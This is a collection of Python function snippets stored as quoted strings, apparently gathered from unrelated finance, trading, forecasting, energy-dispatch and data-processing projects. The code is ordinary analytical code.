portfolio_PnL.loc[date] = PnL_df.loc[date].sum()\r\n\r\n portfolio_index.loc[date] = np.nansum([previous_index_value,portfolio_PnL.loc[date].values])\r\n previous_index_value = portfolio_index.loc[date]\r\n pre_date = date\r\n\r\n # after first date\r\n else:\r\n BoP_df.loc[date] = EoP_df.loc[pre_date]\r\n # weights override\r\n if date in compnent_weights.index:\r\n none_NaN_index = ~compnent_weights.loc[date].isnull()\r\n if not compnent_weights.loc[date][none_NaN_index].empty:\r\n tmp_sum = BoP_df.loc[date].sum()\r\n BoP_df.loc[date][none_NaN_index.values] = (compnent_weights.loc[date][none_NaN_index.values].values)*tmp_sum\r\n\r\n \r\n EoP_df.loc[date] = BoP_df.loc[date] * (1+component_returns.loc[date])\r\n PnL_df.loc[date] = EoP_df.loc[date].subtract(BoP_df.loc[date])\r\n\r\n portfolio_BoP.loc[date] = BoP_df.loc[date].sum()\r\n portfolio_EoP.loc[date] = EoP_df.loc[date].sum()\r\n portfolio_PnL.loc[date] = PnL_df.loc[date].sum()\r\n \r\n portfolio_index.loc[date] = np.nansum([previous_index_value,portfolio_PnL.loc[date].values])\r\n previous_index_value = portfolio_index.loc[date]\r\n pre_date = date\r\n\r\n\r\n portfolio_returns = portfolio_index.pct_change(1) \r\n portfolio_returns.columns = ['Returns']\r\n\r\n portfolio_index\r\n perf = portfolio_index.calc_stats()\r\n \r\n output = pd.Series(data = [perf,PnL_df,portfolio_index,portfolio_BoP,portfolio_EoP,BoP_df], index=['Portfolio Perf','Component PnL','portfolio_index','portfolio_BoP','portfolio_EoP','BoP_df'])\r\n return output", "def get_discount(self, price):\r\n pass", "def price_generator(self, start, end, periods):\r\n tickers = [self.SelectedTicker]\r\n tick_yahoo = YahooFinancials(tickers)\r\n data = tick_yahoo.get_historical_price_data(start, \r\n end, \r\n periods)\r\n \r\n df = pd.DataFrame({\r\n a: {x['formatted_date']: x['adjclose'] for x in data[a]['prices']} for a in tickers})\r\n \r\n self.prices = df.dropna()\r\n self.returns = self.prices.pct_change().dropna()\r\n try:\r\n self.div_yield = tick_yahoo.get_dividend_yield()\r\n #print(self.div_yield[self.SelectedTicker])\r\n if self.div_yield[self.SelectedTicker] == None:\r\n self.div_yield = 0.00\r\n else:\r\n self.div_yield = self.div_yield[self.SelectedTicker]\r\n except:\r\n print(\"no dividend yield\")", "def Componentwise_Boosting(df_train, df_test, nu):\n\n # number of individual forecasts and number of periods\n K = df_test.shape[1]\n T = df_train.shape[0]\n T_test = df_test.shape[0]\n\n # variable of interest\n y = df_train.iloc[:, 0].values[:, np.newaxis]\n y_bar = np.mean(y)\n\n # individual forecasts\n F = np.swapaxes(df_train.iloc[:, 1:].values, 0, 1)[:, :, np.newaxis]\n F_t = np.swapaxes(F, 1, 2)\n F_test = np.swapaxes(df_test.values, 0, 1)[:, :, np.newaxis]\n\n # 5-fold CV to determine optimal M\n # length of training and testing sets\n T_cv_test = int(T/5)\n T_cv_train = T - T_cv_test\n\n # initialize vector to store the precision of fit\n SSR_vec = np.full(1000, 0, dtype=float)\n\n # find the optimal number of boosting iterationts using 5-fold CV\n # CV folds\n for k in range(5):\n\n # definition of the test and training sample for the given CV round\n cv_index = np.full(T, True, dtype=bool)\n cv_index[(k*T_cv_test):((k+1)*T_cv_test)] = False\n\n y_cv = y[cv_index]\n y_cv_bar = np.mean(y_cv)\n y_cv_test = y[~cv_index]\n\n F_cv = F[:, cv_index, :]\n F_cv_t = F_t[:, :, cv_index]\n F_cv_test = F[:, ~cv_index, :]\n\n # initialization step\n psi = np.tile(y_cv_bar, (T_cv_train, 1))\n psi_test = np.tile(y_cv_bar, (T_cv_test, 1))\n\n # main steps\n for m in range(1000):\n\n # compute the negative gradient vector\n u = y_cv - psi\n\n # regress the negative gradient vector on the ind. forecasts\n beta_hat = np.matmul(\n 1/np.matmul(F_cv_t, F_cv),\n np.matmul(F_cv_t, np.tile(u, (K, 1, 1)))\n )\n\n # save the sums of the squared residuals\n SSR = np.dot(np.ones(T_cv_train), (u - (beta_hat * F_cv))**2)\n\n # find the minimum SSR and its corresponding ind.forecast\n k_star = np.argmin(SSR)\n\n # update\n psi += nu * beta_hat[k_star, :, :] * F_cv[k_star, :, :]\n psi_test += nu * beta_hat[k_star, :, :] * F_cv_test[\n k_star, :, :]\n\n # save the precision of the fit\n SSR_vec[m] += np.sum((y_cv_test - psi_test)**2)\n\n # find number of iterations for which the MSE is the lowest\n M = np.argmin(SSR_vec) + 1\n\n # final Gradient Boosting with pre-determined number of iterations M\n # initialization step\n psi = np.tile(y_bar, (T, 1))\n psi_test = np.tile(y_bar, (T_test, 1))\n\n # main steps\n for m in range(M):\n\n # compute the negative gradient vector\n u = y - psi\n\n # regress the negative gradient vector on the individual forecasts\n beta_hat = np.matmul(\n 1/np.matmul(F_t, F),\n np.matmul(F_t, np.tile(u, (K, 1, 1)))\n )\n\n # save the sums of the squared residuals\n SSR = np.dot(np.ones(T), (u - (beta_hat * F))**2)\n\n # find the minimum SSR and its corresponding individual forecast\n k_star = np.argmin(SSR)\n\n # update\n psi += nu * beta_hat[k_star, :, :] * F[k_star, :, :]\n psi_test += nu * beta_hat[k_star, :, :] * F_test[k_star, :, :]\n\n # predictions\n df_pred = pd.DataFrame(\n {\"Componentwise Boosting\": psi_test.flatten()},\n index=df_test.index\n )\n\n return df_pred", "def performance_vs_index(self, index='SPY', dateIni='Ini', dateFin='Fin'):\n if dateFin == 'Fin':\n dateFin = self.data.index[-1]\n if dateIni == 'Ini':\n dateIni = self.data.index[0]\n portfolioGains = round(self.data.loc[self.data.index[-1], 'Profit/Loss%'], 2)\n else:\n pData = self.data.loc[dateIni:dateFin]\n pData.loc[:,'Profit/Loss'] = pData['Gains'].cumsum()\n pData.loc[:,'Profit/Loss%'] = pData['Profit/Loss'] / pData['Invested'] * 100\n portfolioGains = round(pData.loc[pData.index[-1], 'Profit/Loss%'], 2)\n indexData = yf.Ticker(index).history(start=dateIni, end=dateFin)\n indexData['Var%'] = (indexData.Close - indexData.Close[0]) / indexData.Close[0] * 100\n indexGains = round(indexData.loc[indexData.index[-1], 'Var%'], 2)\n return portfolioGains, indexGains, portfolioGains - indexGains", "def replacement_costs(self, proforma, technologies):\n replacement_df = pd.DataFrame()\n for der_inst in technologies:\n temp = der_inst.replacement_report(self.end_year, self.apply_rate)\n if temp is not None and not temp.empty:\n replacement_df = pd.concat([replacement_df, temp], axis=1)\n proforma = proforma.join(replacement_df)\n proforma = proforma.fillna(value=0)\n return proforma", "def sub_tax_transfer_pricing_eur(manager, df_fields, seq_recs, seq_reservas):\n # df_hotel = manager.get_dataframe(tables[\"dwc_bok_t_canco_hotel\"])\n # df_circuit = manager.get_dataframe(tables[\"dwc_bok_t_canco_hotel_circuit\"])\n # df_other = manager.get_dataframe(tables[\"dwc_bok_t_canco_other\"])\n # df_transfer = manager.get_dataframe(tables[\"dwc_bok_t_canco_transfer\"])\n # df_endow = manager.get_dataframe(tables[\"dwc_bok_t_canco_endowments\"])\n # df_extra = manager.get_dataframe(tables[\"dwc_bok_t_canco_extra\"])\n\n df_aux = df_fields.select(\"operative_incoming\", \"booking_id\", \"invoicing_company\", \"creation_date\",\n \"booking_currency\")\n\n df_hotel = sub_tax_transfer_pricing_eur_aux(manager, df_hotelt, seq_recs, seq_reservas, df_aux)\n df_circuit = sub_tax_transfer_pricing_eur_aux(manager, df_circuitt, seq_recs, seq_reservas, df_aux)\n df_other = sub_tax_transfer_pricing_eur_aux(manager, df_othert, seq_recs, seq_reservas, df_aux)\n df_transfer = sub_tax_transfer_pricing_eur_aux(manager, df_transfert, seq_recs, seq_reservas, df_aux)\n df_endow = sub_tax_transfer_pricing_eur_aux(manager, df_endowt, seq_recs, seq_reservas, df_aux)\n df_extra = sub_tax_transfer_pricing_eur_aux_extra(manager, df_extrat, seq_recs, seq_reservas, df_aux)\n\n df_impuesto_canco = df_hotel.union(df_circuit).union(df_other).union(df_transfer).union(df_endow).union(\n df_extra)\n\n df_impuesto_canco = df_impuesto_canco.groupBy(\"operative_incoming\", \"booking_id\") \\\n .agg({'impuesto_canco': 'sum'}).withColumnRenamed(\"SUM(impuesto_canco)\", \"impuesto_canco\")\n\n df_impuesto_canco = df_impuesto_canco.withColumnRenamed(\"operative_incoming\", \"seq_rec\") \\\n .withColumnRenamed(\"booking_id\", \"seq_res\")\n\n df_fields = df_fields.join(df_impuesto_canco, [df_fields.operative_incoming == df_impuesto_canco.seq_rec,\n df_fields.booking_id == df_impuesto_canco.seq_res],\n 'left_outer').drop(\"seq_rec\", \"seq_res\")\n\n df_addcanco = sub_transfer_pricing_aux_add_canco(manager, df_fields, seq_recs, seq_reservas, EUR)\n\n df_addcanco = df_addcanco.withColumnRenamed(\"operative_incoming\", \"seq_rec\") \\\n .withColumnRenamed(\"booking_id\", \"seq_res\")\n\n # add add_impuesto_canco\n df_fields = df_fields.join(df_addcanco, [df_fields.operative_incoming == df_addcanco.seq_rec,\n df_fields.booking_id == df_addcanco.seq_res],\n \"left_outer\").drop(df_addcanco.seq_rec).drop(df_addcanco.seq_res)\n\n df_fields = df_fields.na.fill({'impuesto_canco': 0, 'add_impuesto_canco': 0})\n\n df_fields = df_fields.withColumn(\"Tax_Transfer_pricing_EUR\",\n df_fields.impuesto_canco + df_fields.add_impuesto_canco) \\\n .drop(\"impuesto_canco\", \"add_impuesto_canco\")\n\n del df_hotel, df_circuit, df_other, df_transfer, df_endow, df_extra, df_impuesto_canco, df_addcanco\n\n return df_fields", "def pricing_line(self):\n self.data['pricing_line'] = (((self.data['Close'].shift(1)) < (self.data['Open'].shift(1))) & \\\n (((self.data['Open'].shift(1) + self.data['Close'].shift(1)) / 2) < (self.data['Close'])) & \\\n ((self.data['Open'] < self.data['Close']) & (self.data['Open'] < self.data['Close'].shift(1))) & \\\n (self.data['Close'] < self.data['Open'].shift(1)) & \\\n ((self.data['Close'] - self.data['Open']) / (0.001 + (self.data['High'] - self.data['Low'])) > 0.6))", "def create_feats_and_preds(price_df, feat_days, pred_days):\n\n # create shifted percent features\n df_feats = price_n_days_out(price_df, days=feat_days)\n df_help = df_feats.copy()[['ticker', 'prediction_date', f'price_{feat_days}_out']]\n df_help.columns = ['ticker', 'date', 'close']\n df_preds = price_n_days_out(df_help, days=pred_days)\n\n # do some cleaning\n full_df = pd.merge(df_feats, df_preds, left_on=['ticker', 'prediction_date'], right_on=['ticker', 'date'])\n full_df.columns = ['ticker', 'past_date', 'past_close', 'current_date', 'current_price',\n 'percent_change_feat', 'date_y', 'close_y', 'prediction_date',\n 'price_5_out_y', 'percent_change_pred']\n full_df = full_df[['ticker', 'past_date', 'current_date', 'prediction_date',\n 'percent_change_feat', 'percent_change_pred']]\n return full_df", "def market_value(dh: DataHandler):\n scenario_order = [\n str(dh.scenarios.active_scenarios[keys][\"name\"])\n for keys in dh.scenarios.active_scenarios\n ]\n\n # adding all vintage classes together\n df_supply = dh.get(\"o_supply\").groupby([\"r\", \"tec_supply\", \"t\"]).sum()\n df_supply = df_supply.stack().unstack(\"t\").T\n df_price = dh.get(\"o_prices\").stack().unstack(\"t\").T\n #print(df_supply.mul(df_price, fill_value = 0))\n\n # calculate market value\n df_mv = (\n df_supply.mul(df_price)\n .sum()\n .div(df_supply.sum())\n .unstack(\"scenario\")\n )\n df_mv = df_mv[scenario_order]\n\n df_PtHydrogen = pd.concat(\n [dh.get(\"o_h2price_sell\")], keys=[\"PtHydrogen\"], names=[\"tec_supply\"]\n )\n df_PtHydrogen = df_PtHydrogen.reorder_levels([\"r\", \"tec_supply\"])\n df_mv = pd.concat([df_mv, df_PtHydrogen])\n df_mv.fillna(0,inplace=True)\n\n return df_mv", "def calculate_indicators(ohlcv):\n\tprint(\"\\tCalculating technical indicators\")\n\n\tohlcv = ohlcv.drop([\"Volume (BTC)\", \"Weighted Price\"], axis=1)\n\tohlcv.columns = [\"Date\", \"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]\n\n\ttemp_ohlcv = ohlcv.copy()\n\n\t# Converts ISO 8601 timestamps to UNIX\n\tunix_times = [int((dp.parse(temp_ohlcv.iloc[index][\"Date\"])).strftime(\"%s\")) for index in range(temp_ohlcv.shape[0])]\n\ttemp_ohlcv[\"Date\"] = (pd.Series(unix_times)).values\n\n\t# Converts column headers to lowercase and sorts rows in chronological order\n\ttemp_ohlcv.columns = [\"date\", \"open\", \"high\", \"low\", \"close\", \"volume\"]\n\ttemp_ohlcv = temp_ohlcv.iloc[::-1]\n\n\t# Rate of Change Ratio\n\trocr3 = ((Indicator(temp_ohlcv, \"ROCR\", 3)).getHistorical())[::-1]\n\trocr6 = ((Indicator(temp_ohlcv, \"ROCR\", 6)).getHistorical())[::-1]\n\n\t# Average True Range\n\tatr = ((Indicator(temp_ohlcv, \"ATR\", 14)).getHistorical())[::-1]\n\n\t# On-Balance Volume\n\tobv = ((Indicator(temp_ohlcv, \"OBV\")).getHistorical())[::-1]\n\n\t# Triple Exponential Moving Average\n\ttrix = ((Indicator(temp_ohlcv, \"TRIX\", 20)).getHistorical())[::-1]\n\n\t# Momentum\n\tmom1 = ((Indicator(temp_ohlcv, \"MOM\", 1)).getHistorical())[::-1]\n\tmom3 = ((Indicator(temp_ohlcv, \"MOM\", 3)).getHistorical())[::-1]\n\n\t# Average Directional Index\n\tadx14 = ((Indicator(temp_ohlcv, \"ADX\", 14)).getHistorical())[::-1]\n\tadx20 = ((Indicator(temp_ohlcv, \"ADX\", 20)).getHistorical())[::-1]\n\n\t# Williams %R\n\twillr = ((Indicator(temp_ohlcv, \"WILLR\", 14)).getHistorical())[::-1]\n\n\t# Relative Strength Index\n\trsi6 = ((Indicator(temp_ohlcv, \"RSI\", 6)).getHistorical())[::-1]\n\trsi12 = ((Indicator(temp_ohlcv, \"RSI\", 12)).getHistorical())[::-1]\n\n\t# Moving Average Convergence Divergence\n\tmacd, macd_signal, macd_hist = (Indicator(temp_ohlcv, \"MACD\", 12, 26, 9)).getHistorical()\n\tmacd, macd_signal, macd_hist = macd[::-1], macd_signal[::-1], macd_hist[::-1]\n\n\t# Exponential Moving Average\n\tema6 = ((Indicator(temp_ohlcv, \"MA\", 6, 1)).getHistorical())[::-1]\n\tema12 = ((Indicator(temp_ohlcv, \"MA\", 12, 1)).getHistorical())[::-1]\n\n\t# Append indicators to the input datasets\n\tmin_length = min(len(mom1), len(mom3), len(adx14), len(adx20), len(willr), len(rsi6), len(rsi12), len(macd), len(macd_signal), len(macd_hist), len(ema6), len(ema12), len(rocr3), len(rocr6), len(atr), len(obv), len(trix))\n\tohlcv = ohlcv[:min_length].drop([\"Open\", \"High\", \"Low\"], axis=1)\n\n\tohlcv[\"MOM (1)\"], ohlcv[\"MOM (3)\"], ohlcv[\"ADX (14)\"] = (pd.Series(mom1[:min_length])).values, (pd.Series(mom3[:min_length])).values, (pd.Series(adx14[:min_length])).values\n\tohlcv[\"ADX (20)\"], ohlcv[\"WILLR\"], ohlcv[\"RSI (6)\"] = (pd.Series(adx20[:min_length])).values, (pd.Series(willr[:min_length])).values, (pd.Series(rsi6[:min_length])).values\n\tohlcv[\"RSI (12)\"], ohlcv[\"MACD\"], ohlcv[\"MACD (Signal)\"] = (pd.Series(rsi12[:min_length])).values, (pd.Series(macd[:min_length])).values, (pd.Series(macd_signal[:min_length])).values\n\tohlcv[\"MACD (Historical)\"], ohlcv[\"EMA (6)\"], ohlcv[\"EMA (12)\"] = (pd.Series(macd_hist[:min_length])).values, (pd.Series(ema6[:min_length])).values, (pd.Series(ema12[:min_length])).values\n\tohlcv[\"ROCR (3)\"], ohlcv[\"ROCR (6)\"], ohlcv[\"ATR (14)\"] = (pd.Series(rocr3[:min_length])).values, (pd.Series(rocr6[:min_length])).values, (pd.Series(atr[:min_length])).values\n\tohlcv[\"OBV\"], ohlcv[\"TRIX (20)\"] = (pd.Series(obv[:min_length])).values, (pd.Series(trix[:min_length])).values\n\n\treturn ohlcv", "def dollar_sampling(df, dollars_per_bar = 2e6):\n \n # add cumulative dollar column\n data_cm_dollar = df.assign(cmDollar=df['foreignNotional'].cumsum())\n \n # compute total_dollars\n total_dollars = data_cm_dollar.cmDollar.values[-1]\n \n # group trade by cmDollar//dollars_per_bar as groupId\n data_dollar_grp = data_cm_dollar.assign(grpId=lambda row: row.cmDollar // dollars_per_bar)\n \n # for each groupId, compute vwap, OHLC, volume, and number of trades\n data_dollar_ohlc = data_dollar_grp.groupby('grpId').apply(lambda x: _ohlc(_compute_vwap(x)))\n \n # drop index level\n data_dollar_ohlc.index = data_dollar_ohlc.index.droplevel()\n \n # drop rows with duplicated index but keep the first occurence\n data_dollar_ohlc = data_dollar_ohlc[~data_dollar_ohlc.index.duplicated(keep='first')]\n \n # keep columns\n mask = ['vwap', 'open', 'high', 'low', 'close', 'volume', 'trades']\n data_dollar_ohlc = data_dollar_ohlc[mask]\n \n return data_dollar_ohlc", "def hypoTest3(df):\n gs = df\n\n # Calculate Theatre size\n # account for cases with 0s\n\n gs['num_of_seats'] = 0\n gs.loc[(gs.seats_sold > 0) & (gs.perfs > 0) & (gs.percent_of_cap > 0), 'num_of_seats'] = (gs.seats_sold/gs.percent_of_cap/gs.perfs)\n\n testData = gs[(gs['num_of_seats'] > 0) & (gs['avg_ticket_price'] > 0)]\n testData = testData[['show','avg_ticket_price', 'num_of_seats', 'month', 'year']]\n\n # delete duplicates\n testData = testData.sort_values('num_of_seats').drop_duplicates('show')\n testData.hist()\n\n # normalize testData\n testData['log_num_seats'] = np.log(testData[['num_of_seats']])\n testData['log_price'] = np.log(testData[['avg_ticket_price']])\n\n lm_results = smf.ols('log_price ~ log_num_seats + month + year', data = testData).fit()\n\n print(lm_results.summary())", "def my_rebalance(context,data):\n log.info(\"rebalancing...\")\n context.output = pipeline_output('my_pipeline')\n log.info(\"retrieved pipeline output...\")\n \n # These are the securities that we are interested in trading each day.\n context.security_list = context.output.index\n \n if context.prime == False:\n order_target_percent(symbol('SPY'),1) #hold SPY as a default \n context.prime = True\n \n weight= 1.0/len(context.security_list)\n \n for stock in context.security_list:\n log.info(\"Buying %s\" % (stock.symbol))\n order_target_percent(stock, weight)\n \n #: Exit any positions we might have\n for stock in context.portfolio.positions:\n if data.can_trade(stock) and stock not in context.security_list:\n log.info(\"Exiting our positions on %s\" % (stock.symbol))\n order_target_percent(stock, 0)", "def update_price_signals(self, monthly_data, time_series_data):\n if self.combined_market:\n try:\n fr_price = time_series_data.loc[:, 'FR Price ($/kW)']\n except KeyError:\n pass\n else:\n self.p_regu = np.divide(fr_price, 2)\n self.p_regd = np.divide(fr_price, 2)\n\n try:\n self.price = time_series_data.loc[:, 'DA Price ($/kWh)']\n except KeyError:\n pass\n else:\n try:\n self.p_regu = time_series_data.loc[:, 'Reg Up Price ($/kW)']\n except KeyError:\n pass\n\n try:\n self.p_regd = time_series_data.loc[:, 'Reg Down Price ($/kW)']\n except KeyError:\n pass\n\n try:\n self.price = time_series_data.loc[:, 'DA Price ($/kWh)']\n except KeyError:\n pass", "def featurize_kof(*args):\n\n df = args[0]\n\n # initial cleaning & changes to df\n df = df.drop(columns='Unnamed: 0')\n df = df.rename(columns = {'Code_Style':'code_style', 'Name':'name', 'Brand':'brand', 'Date':'date',\n 'Retail_Price': 'retail_price', 'Colorway':'colorway', 'Story':'story',\n 'KOF_Wants':'kof_wants', 'Avg_Resale':'avg_resale_stockx'})\n df['retail_price'] = df['retail_price'].astype(int)\n df['avg_resale_stockx'] = df['avg_resale_stockx'].str.replace('[^\\w\\s]','')\n df['avg_resale_stockx'] = df['avg_resale_stockx'].astype(int)\n\n # feature 1: merge silhouettes\n all_silhouettes = eval(args[1])\n # strip out brand name from silhouette name\n temp = []\n for i in range(len(all_silhouettes)):\n silhouette = all_silhouettes[i]\n silhouette = silhouette.replace(\"Nike \", \"\")\n silhouette = silhouette.replace(\"Adidas \", \"\")\n silhouette = silhouette.replace(\"adidas \", \"\")\n temp.append(silhouette)\n all_silhouettes = temp\n all_silhouettes.append('Air Jordan 1')\n all_silhouettes = list(set(all_silhouettes))\n df['silhouette'] = df['name'].apply(lambda x: silhouette_generator(x, all_silhouettes))\n\n #feature 2: profitable\n #create columns to calculate net profit\n df['price_diff'] = df['avg_resale_stockx'] - df['retail_price']\n df['commission_fee'] = abs((df['avg_resale_stockx']) * (9.5/100))\n df['seller_fee'] = 5\n df['total_credit'] = df['price_diff'] - df['commission_fee'] - df['seller_fee']\n df['cashout_fee'] = abs((df['total_credit']) * (2.9/100))\n df['net_profit'] = df['total_credit'] - df['cashout_fee']\n #create purchase feature if the net profit is greater than 0\n df['profitable'] = np.where(df['net_profit'] > 0, 1, 0)\n #drop columns used to calculate net profit\n df.drop(['commission_fee', 'seller_fee', 'total_credit', 'cashout_fee'], axis=1, inplace=True)\n\n #feature 3: brand code\n brand_code = df.groupby('brand').ngroup()\n df = pd.concat([df, brand_code], axis=1).rename(columns={0:'brand_code'})\n\n #feature 4: word2vec colors\n nlp = spacy.load('en_vectors_web_lg')\n df['black'] = df['colorway'].apply(lambda x: color_word2vec(x, \"black\", nlp))\n df['white'] = df['colorway'].apply(lambda x: color_word2vec(x, \"white\", nlp))\n df['brown'] = df['colorway'].apply(lambda x: color_word2vec(x, \"brown\", nlp))\n df['red'] = df['colorway'].apply(lambda x: color_word2vec(x, \"red\", nlp))\n df['blue'] = df['colorway'].apply(lambda x: color_word2vec(x, \"blue\", nlp))\n df['yellow'] = df['colorway'].apply(lambda x: color_word2vec(x, \"yellow\", nlp))\n df['orange'] = df['colorway'].apply(lambda x: color_word2vec(x, \"orange\", nlp))\n df['green'] = df['colorway'].apply(lambda x: color_word2vec(x, \"green\", nlp))\n df['purple'] = df['colorway'].apply(lambda x: color_word2vec(x, \"purple\", nlp))\n df['multi_color'] = df['colorway'].apply(lambda x: color_word2vec(x, \"multi color\", nlp))\n df['main_color'] = df[['black', 'white', 'brown', 'red', 'blue', 'yellow',\n 'orange', 'green', 'purple', 'multi_color']].idxmax(axis=1)\n df['main_color_id'] = df.groupby('main_color').ngroup()\n\n #boolean features\n df['womens'] = df['name'].apply(lambda x: label_womens(x))\n\n df['bcollab'] = df['name'].apply(lambda x: label_bcollab(x))\n\n df['og'] = df['name'].apply(lambda x: label_og(x))\n\n df['sp'] = df['name'].apply(lambda x: label_sp(x))\n\n df['qs'] = df['name'].apply(lambda x: label_qs(x))\n\n df['sb'] = df['name'].apply(lambda x: label_sb(x))\n\n df['ls'] = df['name'].apply(lambda x: label_ls(x))\n\n df['nrg'] = df['name'].apply(lambda x: label_nrg(x))\n\n df['prm'] = df['name'].apply(lambda x: label_prm(x))\n\n df['nsw'] = df['name'].apply(lambda x: label_nsw(x))\n\n df['retro'] = df['name'].apply(lambda x: label_retro(x))\n\n df['se'] = df['name'].apply(lambda x: label_se(x))\n\n df['pe'] = df['name'].apply(lambda x: label_pe(x))\n\n df['gs'] = df['name'].apply(lambda x: label_gs(x))\n\n df['hs'] = df['name'].apply(lambda x: label_hs(x))\n\n return df", "def __init__(\n self,\n portfolio,\n market=None,\n commission_min=5.00,\n commission_pct=0.0,\n buy_percent=1.0,\n sell_percent=1.0,\n pm_threshold=0.0,\n pm_order=1.0,\n risk_free_return=1.0,\n name=None\n ):\n\n # Assumptions\n self.name = name if name else portfolio.name\n self.commission_min = commission_min\n self.commission_pct = commission_pct\n self.buy_percent = buy_percent\n self.sell_percent = sell_percent\n self.pm_threshold = pm_threshold\n self.pm_order = pm_order\n self.risk_free_return = risk_free_return\n self.performance = {}\n\n # Inputs\n self.portfolio = portfolio\n self.market = copy.deepcopy(market) if market else Asset(np.ones(len(self.portfolio.dates)))\n\n # Trading states\n self.long_open = {symbol:False for symbol in portfolio.assets.keys()}\n self.short_open = {symbol:False for symbol in portfolio.assets.keys()}\n\n # Keep track of intermidiate results for performance\n self.trade_data = []\n recordings = [\n 'buy price', 'buy shares', 'buy fees', 'buy date',\n 'sell price', 'sell shares', 'sell fees', 'sell date',\n 'gain', 'profit', 'loss', 'return', 'win/loose',\n 'min balance', 'min date', 'max balance', 'max date',\n 'drawdown', 'drawdown days',\n 'volatility', 'expected_return', 'beta', 'lpm', 'hpm',\n 'max', 'mean', 'min'\n ]\n self.record = {symbol:pd.DataFrame(columns=recordings) for symbol in portfolio.assets.keys()}\n self.max = {symbol:[portfolio.assets[symbol].c.iloc[0], None] for symbol in portfolio.assets.keys()}\n self.min = {symbol:[999999999999999, None] for symbol in portfolio.assets.keys()}\n self.drawdown = {symbol:[999999999999999, None] for symbol in portfolio.assets.keys()}", "def testAggregateCorrectly(self):\n\n\tscaler = pf.LinearScaler()\n\tQBp = pf.ProductQuoteBasis(base_price = 1.53, date = dt.datetime(2012,01,01), source = \"P&T\", scaler = scaler, size_basis = uv.UnitVal(1, '1/gal'))\n\tesc = pf.NoEscalationEscalator()\n\tpr1 = pf.Product(name = 'gasoline', description = 'People', quote_basis = QBp, escalator = esc)\n\n\tpro1 = pf.Production(name = 'stream1', product = pr1, rate = uv.UnitVal(15000, 'gal/hr'), startup_discounter = None, init_date = dt.datetime(2012,01,01))\n\n\tQB = pf.VariableExpenseQuoteBasis(base_price = 0.062, date = dt.datetime(2012,01,01), source = \"P&T\", scaler = scaler, size_basis = uv.UnitVal(1, '1/(kW*hr)'))\n\tvex1 = pf.VariableExpense(name = 'Electricity', description = 'Power consumption by plant', quote_basis = QB, production = pro1, rate = uv.UnitVal(1, 'kW*hr/gal'), escalator = esc)\n\n\tQB2 = pf.VariableExpenseQuoteBasis(base_price = 75, date = dt.datetime(2012,01,01), source= 'Tom Miles', scaler = scaler, size_basis = uv.UnitVal(1, '1/ton'))\n\tvex2 = pf.VariableExpense(name = 'Biomass', description = 'Biomass used by plant', quote_basis = QB2, production = pro1, rate = uv.UnitVal(1.0/150.0, 'ton/gal'), escalator = esc)\n\n\tdates = [dt.datetime(2012,01,31), dt.datetime(2013,01,31), dt.datetime(2020, 03, 31), dt.datetime(2021, 12,31)]\n vals = [202320,202320,202320,202320]\n\tend_date = dt.datetime(2034,12,31)\n\tcosts = pf.VariableCosts()\n costs.add_variable_expense(vex1)\n costs.add_variable_expense(vex2)\n costs.build_vex_schedule(end_date)\n\t\n for d, v in zip(dates, vals):\n self.assertAlmostEqual(v, costs.schedule.loc[d, 'variable_costs'],4)", "def dispatch_max_sc_bhv(pv, demand, bhv,prices_binned,inv_size,param , return_series=False, bins_soc=[0,33,66,100],bins_price=[0.04,0.12,0.20,0.28],kW_dis=4):\n \n bat_size_e_adj = param['BatteryCapacity']\n bat_size_p_adj = param['MaxPower']\n n_bat = param['BatteryEfficiency']\n n_inv = param['InverterEfficiency']\n timestep = param['timestep']\n # We work with np.ndarrays as they are much faster than pd.Series\n Nsteps = len(pv)\n LevelOfCharge = np.zeros(Nsteps)\n inv2grid = np.zeros(Nsteps)\n inv_array=np.tile(inv_size/n_inv,len(pv))\n pv2store = np.zeros(Nsteps)\n store2inv = np.zeros(Nsteps)\n inv2curt = np.zeros(Nsteps)\n \n flagsell = np.zeros(Nsteps)\n store2load = np.zeros(Nsteps)\n store2grid = np.zeros(Nsteps)\n flag_12h=np.full((Nsteps), False)\n #grid2store = np.zeros(Nsteps) # TODO Always zero for now.\n \n #Load served by PV\n pv2load_dc = np.array([pv, demand / n_inv,inv_array]).min(axis=0) # DC direct self-consumption, with inverter limitation\n\n #Residual load\n res_load = demand - (pv2load_dc * n_inv) # AC\n inv2load = pv2load_dc * n_inv # AC\n\n #Excess PV\n res_pv = pv-pv2load_dc # DC\n\n #PV to storage after eff losses\n pv2inv = pv2load_dc*n_inv # AC\n\n #first timestep = 0\n LevelOfCharge[0] = 0 # bat_size_e_adj / 2 # DC\n\n #get the sp hours\n delta=dt.timedelta(hours=12)\n sp_hour=res_pv.ne(0).groupby([res_pv.index.month,res_pv.index.day]).idxmax().droplevel(1).reset_index(drop=True)\n twelve_bf=sp_hour-delta\n\n for i in range(1,Nsteps): \n #PV to storage\n if LevelOfCharge[i-1] >= bat_size_e_adj: # if battery is full\n pv2store[i] = 0\n else: #if battery is not full\n if LevelOfCharge[i-1] + res_pv[i] * n_bat * timestep > bat_size_e_adj: # if battery will be full after putting excess\n pv2store[i] = min((bat_size_e_adj - LevelOfCharge[i-1]) / timestep, bat_size_p_adj)\n else:\n# pv2store[i] = min(res_pv[i], bat_size_p_adj)\n pv2store[i] = min(res_pv[i] * n_bat, bat_size_p_adj)\n #Storage to load\n if (pv2store[i]==0)&(res_pv[i]==0): \n #According to prosumer behaviour the battery will inject into the community or not only if there is not PV suplus\n store2load[i] = min(bat_size_p_adj,(inv_size/n_inv-pv2load_dc[i]), #Power\n res_load[i] / n_inv, #Power\n LevelOfCharge[i-1] / timestep) # Power; all in DC\n if (pv.index[i]<=sp_hour[int(np.floor((i)/96))]) & (pv.index[i]>twelve_bf[int(np.floor((i)/96))]):\n #if timestep is between twelve hours before and the surplus hour\n try:\n flag_12h[i]=True\n if np.array(bhv.loc[(bhv.Price_binned==prices_binned[i])&\n (bhv.SOC_binned==np.digitize(LevelOfCharge[i-1],bins=bins_soc))&\n (bhv.surplus_time=='12h'),'sell'].values):#if sell\n #surplus_time==12h\n # sell 1 kWh of energy to the community and cover residual load if excess\n #print('12hsell')\n flagsell[i]=1\n store2grid[i] = min(bat_size_p_adj-store2load[i],(inv_size/n_inv-pv2load_dc[i]-store2load[i]), #Power\n kW_dis / n_inv, #Power\n (LevelOfCharge[i-1]) / timestep-store2load[i])# Power; all in DC\n store2inv[i] = (store2load[i]+store2grid[i]) # DC\n\n # here should take into account whether the prosumer desires to sell or not according to his preferences (SOC,price)\n else: # no sell then cover only res_load\n #print('out12h')\n store2inv[i] = (store2load[i]+store2grid[i]) #DC\n except Exception as e:\n # Ugly but provisional SOC 